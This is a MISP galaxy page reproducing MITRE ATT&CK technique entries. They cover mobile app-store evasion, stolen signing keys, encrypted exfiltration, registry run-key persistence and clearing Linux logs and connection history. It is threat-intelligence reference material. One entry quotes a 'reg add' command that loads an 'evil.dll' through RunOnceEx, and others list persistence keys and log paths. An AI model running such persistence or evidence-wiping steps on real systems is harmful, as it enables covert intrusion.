Skip to content

Hide Navigation Hide TOC

Edit

Attack Pattern

ATT&CK tactic

Authors
Authors and/or Contributors
MITRE

Test ability to evade automated mobile application security analysis performed by app stores - T1393

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). An adversary can submit multiple code samples to these stores deliberately designed to probe the stores' security analysis capabilities, with the goal of determining effective techniques to place malicious applications in the stores that could then be delivered to targeted devices. (Citation: Android Bouncer) (Citation: Adventures in BouncerLand) (Citation: Jekyll on iOS) (Citation: Fruit vs Zombies)

Internal MISP references

UUID c9e85b80-39e8-42df-b275-86a2afcea9e8 which can be used as unique global reference for Test ability to evade automated mobile application security analysis performed by app stores - T1393 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1393
kill_chain ['pre-attack:test-capabilities']

Choose pre-compromised mobile app developer account credentials or signing keys - T1391

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

The adversary can use account credentials or signing keys of an existing mobile app developer to publish malicious updates of existing mobile apps to an application store, or to abuse the developer's identity and reputation to publish new malicious apps. Many mobile devices are configured to automatically install new versions of already-installed apps. (Citation: Fraudenlent Apps Stolen Dev Credentials)

Internal MISP references

UUID 7a265bf0-6acc-4f43-8b22-2e58b443e62e which can be used as unique global reference for Choose pre-compromised mobile app developer account credentials or signing keys - T1391 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1391
kill_chain ['pre-attack:persona-development']

Enumerate externally facing software applications technologies, languages, and dependencies - T1261

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Software applications will be built using different technologies, languages, and dependencies. This information may reveal vulnerabilities or opportunities to an adversary. (Citation: CommonApplicationAttacks) (Citation: WebApplicationSecurity) (Citation: SANSTop25)

Internal MISP references

UUID ef6197fd-a58a-4006-bfd6-1d7765d8409d which can be used as unique global reference for Enumerate externally facing software applications technologies, languages, and dependencies - T1261 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1261
kill_chain ['pre-attack:technical-information-gathering']

Obtain Apple iOS enterprise distribution key pair and certificate - T1392

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

The adversary can obtain an Apple iOS enterprise distribution key pair and certificate and use it to distribute malicious apps directly to Apple iOS devices without the need to publish the apps to the Apple App Store (where the apps could potentially be detected). (Citation: Apple Developer Enterprise Porgram Apps) (Citation: Fruit vs Zombies) (Citation: WIRELURKER) (Citation: Sideloading Change)

Internal MISP references

UUID d58f3996-e293-4f69-a2c8-0e1851cb8297 which can be used as unique global reference for Obtain Apple iOS enterprise distribution key pair and certificate - T1392 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1392
kill_chain ['pre-attack:persona-development']

Analyze social and business relationships, interests, and affiliations - T1295

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Social media provides insight into the target's affiliations with groups and organizations. Certification information can explain their technical associations and professional associations. Personal information can provide data for exploitation or even blackmail. (Citation: Scasny2015)

Internal MISP references

UUID ee40d054-6e83-4302-88dc-a3af98821d8d which can be used as unique global reference for Analyze social and business relationships, interests, and affiliations - T1295 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1295
kill_chain ['pre-attack:people-weakness-identification']

Linux and Mac File and Directory Permissions Modification - T1222.002

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).

Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Unix Shell Configuration Modification or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.(Citation: 20 macOS Common Tools and Techniques)

Internal MISP references

UUID 09b130a2-a77e-4af0-a361-f46f9aad1345 which can be used as unique global reference for Linux and Mac File and Directory Permissions Modification - T1222.002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1222.002
kill_chain ['attack-macOS:defense-evasion', 'attack-Linux:defense-evasion']
mitre_data_sources ['Command: Command Execution', 'File: File Metadata', 'Process: Process Creation']
mitre_platforms ['macOS', 'Linux']
Related clusters

To see the related clusters, click here.

Install and configure hardware, network, and systems - T1336

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

An adversary needs the necessary skills to set up procured equipment and software to create their desired infrastructure. (Citation: KasperskyRedOctober)

Internal MISP references

UUID 73e394e5-3d8a-40d1-ab8c-a1b4ea9db424 which can be used as unique global reference for Install and configure hardware, network, and systems - T1336 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1336
kill_chain ['pre-attack:establish-&-maintain-infrastructure']

Compromise 3rd party or closed-source vulnerability/exploit information - T1354

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

There is usually a delay between when a vulnerability or exploit is discovered and when it is made public. An adversary may target the systems of those known to research vulnerabilities in order to gain that knowledge for use during a different attack. (Citation: TempertonDarkHotel)

Internal MISP references

UUID 5a68c603-d7f9-4535-927e-ab56819eaa85 which can be used as unique global reference for Compromise 3rd party or closed-source vulnerability/exploit information - T1354 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1354
kill_chain ['pre-attack:build-capabilities']

Discover new exploits and monitor exploit-provider forums - T1350

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may need to discover new exploits when existing exploits are no longer relevant to the environment they are trying to compromise. An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. (Citation: EquationQA)

Internal MISP references

UUID 82bbd209-f516-45e0-9542-4ffbbc2a8717 which can be used as unique global reference for Discover new exploits and monitor exploit-provider forums - T1350 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1350
kill_chain ['pre-attack:build-capabilities']

Acquire and/or use 3rd party software services - T1330

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

A wide variety of 3rd party software services are available (e.g., Twitter, Dropbox, GoogleDocs). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LOWBALL2015)

Internal MISP references

UUID 488da8ed-2887-4ef6-a39a-5b69bc6682c6 which can be used as unique global reference for Acquire and/or use 3rd party software services - T1330 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1330
kill_chain ['pre-attack:establish-&-maintain-infrastructure']
Related clusters

To see the related clusters, click here.

Acquire and/or use 3rd party infrastructure services - T1307

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)

Internal MISP references

UUID 286cc500-4291-45c2-99a1-e760db176402 which can be used as unique global reference for Acquire and/or use 3rd party infrastructure services - T1307 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1307
kill_chain ['pre-attack:adversary-opsec']
Related clusters

To see the related clusters, click here.

Acquire and/or use 3rd party software services - T1308

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

A wide variety of 3rd party software services are available (e.g., Twitter, Dropbox, GoogleDocs). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012) (Citation: Nemucod Facebook)

Internal MISP references

UUID 1a295f87-af63-4d94-b130-039d6221fb11 which can be used as unique global reference for Acquire and/or use 3rd party software services - T1308 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1308
kill_chain ['pre-attack:adversary-opsec']
Related clusters

To see the related clusters, click here.

Test signature detection for file upload/email filters - T1361

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

An adversary can test their planned method of attack against existing security products such as email filters or intrusion detection sensors (IDS). (Citation: WiredVirusTotal)

Internal MISP references

UUID c9ac5715-ee5c-4380-baf4-6f12e304ca93 which can be used as unique global reference for Test signature detection for file upload/email filters - T1361 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1361
kill_chain ['pre-attack:test-capabilities']

Acquire and/or use 3rd party infrastructure services - T1329

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: TrendmicroHideoutsLease)

Internal MISP references

UUID 795c1a92-3a26-453e-b99a-6a566aa94dc6 which can be used as unique global reference for Acquire and/or use 3rd party infrastructure services - T1329 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1329
kill_chain ['pre-attack:establish-&-maintain-infrastructure']
Related clusters

To see the related clusters, click here.

Acquire or compromise 3rd party signing certificates - T1310

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Code signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)

Internal MISP references

UUID e5164428-03ca-4336-a9a7-4d9ea1417e59 which can be used as unique global reference for Acquire or compromise 3rd party signing certificates - T1310 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1310
kill_chain ['pre-attack:adversary-opsec']
Related clusters

To see the related clusters, click here.

Compromise 3rd party infrastructure to support delivery - T1312

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)

Internal MISP references

UUID 4900fabf-1142-4c1f-92f5-0b590e049077 which can be used as unique global reference for Compromise 3rd party infrastructure to support delivery - T1312 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1312
kill_chain ['pre-attack:adversary-opsec']
Related clusters

To see the related clusters, click here.

Acquire or compromise 3rd party signing certificates - T1332

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: DiginotarCompromise)

Internal MISP references

UUID 03f4a766-7a21-4b5e-9ccf-e0cf422ab983 which can be used as unique global reference for Acquire or compromise 3rd party signing certificates - T1332 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1332
kill_chain ['pre-attack:establish-&-maintain-infrastructure']
Related clusters

To see the related clusters, click here.

Compromise 3rd party infrastructure to support delivery - T1334

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)

Internal MISP references

UUID e51398e6-53dc-4e9f-a323-e54683d8672b which can be used as unique global reference for Compromise 3rd party infrastructure to support delivery - T1334 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1334
kill_chain ['pre-attack:establish-&-maintain-infrastructure']
Related clusters

To see the related clusters, click here.

Human performs requested action of physical nature - T1385

This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.

Through social engineering or other methods, an adversary can get users to perform physical actions that provide access to an adversary. This could include providing a password over the phone or inserting a 'found' CD or USB into a system. (Citation: AnonHBGary) (Citation: CSOInsideOutside)

Internal MISP references

UUID fb39384c-00e4-414a-88af-e80c4904e0b8 which can be used as unique global reference for Human performs requested action of physical nature - T1385 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1385
kill_chain ['pre-attack:compromise']

Abuse of iOS Enterprise App Signing Key - T1445

An adversary could abuse an iOS enterprise app signing key (intended for enterprise in-house distribution of apps) to sign malicious iOS apps so that they can be installed on iOS devices without the app needing to be published on Apple's App Store. For example, Xiao describes use of this technique in (Citation: Xiao-iOS).

Detection: iOS 9 and above typically requires explicit user consent before allowing installation of applications signed with enterprise distribution keys rather than installed from Apple's App Store.

Platforms: iOS

Internal MISP references

UUID 51aedbd6-2837-4d15-aeb0-cb09f2bf22ac which can be used as unique global reference for Abuse of iOS Enterprise App Signing Key - T1445 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1445
Related clusters

To see the related clusters, click here.

Deliver Malicious App via Authorized App Store - T1475

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.

App stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses:

Adversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)

Adversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)

Adversaries may also use control of a target's Google account to use the Google Play Store's remote installation capability to install apps onto the Android devices associated with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)

Internal MISP references

UUID d9db3d46-66ca-44b4-9daa-1ef97cb7465a which can be used as unique global reference for Deliver Malicious App via Authorized App Store - T1475 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1475
kill_chain ['mobile-attack-Android:initial-access', 'mobile-attack-iOS:initial-access']
mitre_platforms ['Android', 'iOS']

Device Unlock Code Guessing or Brute Force - T1459

An adversary could make educated guesses of the device lock screen's PIN/password (e.g., commonly used values, birthdays, anniversaries) or attempt a dictionary or brute force attack against it. Brute force attacks could potentially be automated (Citation: PopSci-IPBox).

Platforms: Android, iOS

Internal MISP references

UUID f296fc9c-2ff5-43ee-941e-6b49c438270a which can be used as unique global reference for Device Unlock Code Guessing or Brute Force - T1459 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1459
Related clusters

To see the related clusters, click here.

Assign KITs, KIQs, and/or intelligence requirements - T1238

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Once generated, Key Intelligence Topics (KITs), Key Intelligence Questions (KIQs), and/or intelligence requirements are assigned to applicable agencies and/or personnel. For example, an adversary may decide nuclear energy requirements should be assigned to a specific organization based on their mission. (Citation: AnalystsAndPolicymaking) (Citation: JP2-01)

Internal MISP references

UUID 4fad17d3-8f42-449d-ac4b-dbb4c486127d which can be used as unique global reference for Assign KITs, KIQs, and/or intelligence requirements - T1238 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1238
kill_chain ['pre-attack:priority-definition-direction']

Assess current holdings, needs, and wants - T1236

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Analysts assess current information available against requirements that outline needs and wants as part of the research baselining process to begin satisfying a requirement. (Citation: CyberAdvertisingChar) (Citation: CIATradecraft) (Citation: ForensicAdversaryModeling) (Citation: CyberAdversaryBehavior)

Internal MISP references

UUID 8e927b19-04a6-4aaa-a42f-4f0a53411d27 which can be used as unique global reference for Assess current holdings, needs, and wants - T1236 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1236
kill_chain ['pre-attack:priority-definition-planning']

Submit KITs, KIQs, and intelligence requirements - T1237

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Once they have been created, intelligence requirements, Key Intelligence Topics (KITs), and Key Intelligence Questions (KIQs) are submitted into a central management system. (Citation: ICD204) (Citation: KIT-Herring)

Internal MISP references

UUID 03da0598-ed46-4a73-bf43-0313b3522400 which can be used as unique global reference for Submit KITs, KIQs, and intelligence requirements - T1237 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1237
kill_chain ['pre-attack:priority-definition-direction']

Common, high volume protocols and software - T1321

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Certain types of traffic (e.g., Twitter14, HTTP) are more commonly used than others. Utilizing more common protocols and software may make an adversary's traffic more difficult to distinguish from legitimate traffic. (Citation: symantecNITRO)

Internal MISP references

UUID 0c592c79-29a7-4a94-81a4-c87eae3aead6 which can be used as unique global reference for Common, high volume protocols and software - T1321 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1321
kill_chain ['pre-attack:adversary-opsec']

Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data.

Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP).

Internal MISP references

UUID 79a4052e-1a89-4b09-aea6-51f1d11fe19c which can be used as unique global reference for Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1048.001
kill_chain ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration']
mitre_data_sources ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
mitre_platforms ['Linux', 'macOS', 'Windows']
Related clusters

To see the related clusters, click here.

Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin.

Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.

Internal MISP references

UUID 8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5 which can be used as unique global reference for Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1048.002
kill_chain ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration']
mitre_data_sources ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
mitre_platforms ['Linux', 'macOS', 'Windows']
Related clusters

To see the related clusters, click here.

Non-traditional or less attributable payment options - T1316

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Using alternative payment options allows an adversary to hide their activities. Options include crypto currencies, barter systems, pre-paid cards or shell accounts. (Citation: Goodin300InBitcoins)

Internal MISP references

UUID b79e8a3f-a109-47c2-a0e3-564955590a3d which can be used as unique global reference for Non-traditional or less attributable payment options - T1316 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1316
kill_chain ['pre-attack:adversary-opsec']

Choose pre-compromised persona and affiliated accounts - T1343

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

For attacks incorporating social engineering the utilization of an on-line persona is important. Utilizing an existing persona with compromised accounts may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. (Citation: AnonHBGary) (Citation: Hacked Social Media Accounts)

Internal MISP references

UUID 9a8c47f6-ae69-4044-917d-4b1602af64d9 which can be used as unique global reference for Choose pre-compromised persona and affiliated accounts - T1343 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1343
kill_chain ['pre-attack:persona-development']

Malicious or Vulnerable Built-in Device Functionality - T1473

The mobile device could contain built-in functionality with malicious behavior or exploitable vulnerabilities. An adversary could deliberately insert and take advantage of the malicious behavior or could exploit inadvertent vulnerabilities. In many cases, it is difficult to be certain whether exploitable functionality is due to malicious intent or simply an inadvertent mistake.

Platforms: Android, iOS

Internal MISP references

UUID f9e4f526-ac9d-4df5-8949-833a82a1d2df which can be used as unique global reference for Malicious or Vulnerable Built-in Device Functionality - T1473 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1473
Related clusters

To see the related clusters, click here.

Identify vulnerabilities in third-party software libraries - T1389

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Many applications use third-party software libraries, often without full knowledge of the behavior of the libraries by the application developer. For example, mobile applications often incorporate advertising libraries to generate revenue for the application developer. Vulnerabilities in these third-party libraries could potentially be exploited in any application that uses the library, and even if the vulnerabilities are fixed, many applications may still use older, vulnerable versions of the library. (Citation: Flexera News Vulnerabilities) (Citation: Android Security Review 2015) (Citation: Android Multidex RCE)

Internal MISP references

UUID ad124f84-52d2-40e3-95dd-cfdd44eae6ef which can be used as unique global reference for Identify vulnerabilities in third-party software libraries - T1389 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1389
kill_chain ['pre-attack:technical-weakness-identification']

Registry Run Keys / Startup Folder - T1547.001

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.

The following run keys are created by default on Windows systems:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.

The following Registry keys can be used to set startup folder items for persistence:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

The following Registry keys can control automatic startup of services during boot:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run automatically for the currently logged-on user.

By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.

Internal MISP references

UUID 9efb1ea7-c37b-4595-9640-b7680cd84279 which can be used as unique global reference for Registry Run Keys / Startup Folder - T1547.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1547.001
kill_chain ['attack-Windows:persistence', 'attack-Windows:privilege-escalation']
mitre_data_sources ['Command: Command Execution', 'File: File Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Creation', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Windows']
Related clusters

To see the related clusters, click here.

Clear Linux or Mac System Logs - T1070.002

Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)

  • /var/log/messages:: General and system-related messages
  • /var/log/secure or /var/log/auth.log: Authentication logs
  • /var/log/utmp or /var/log/wtmp: Login records
  • /var/log/kern.log: Kernel logs
  • /var/log/cron.log: Crond logs
  • /var/log/maillog: Mail server logs
  • /var/log/httpd/: Web server access and error logs
Internal MISP references

UUID 2bce5b30-7014-4a5d-ade7-12913fe6ac36 which can be used as unique global reference for Clear Linux or Mac System Logs - T1070.002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1070.002
kill_chain ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion']
mitre_data_sources ['Command: Command Execution', 'File: File Deletion', 'File: File Modification']
mitre_platforms ['Linux', 'macOS']
Related clusters

To see the related clusters, click here.

Clear Network Connection History and Configurations - T1070.007

Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as Remote Services or External Remote Services. Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.

Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):

  • HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
  • HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers

Windows may also store information about recent RDP connections in files such as C:\Users\%username%\Documents\Default.rdp and C:\Users\%username%\AppData\Local\Microsoft\Terminal Server Client\Cache\.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in /Library/Logs and/or /var/log/).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)

Malicious network connections may also require changes to third-party applications or network configuration settings, such as Disable or Modify System Firewall or tampering to enable Proxy. Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.

Internal MISP references

UUID 3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc which can be used as unique global reference for Clear Network Connection History and Configurations - T1070.007 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1070.007
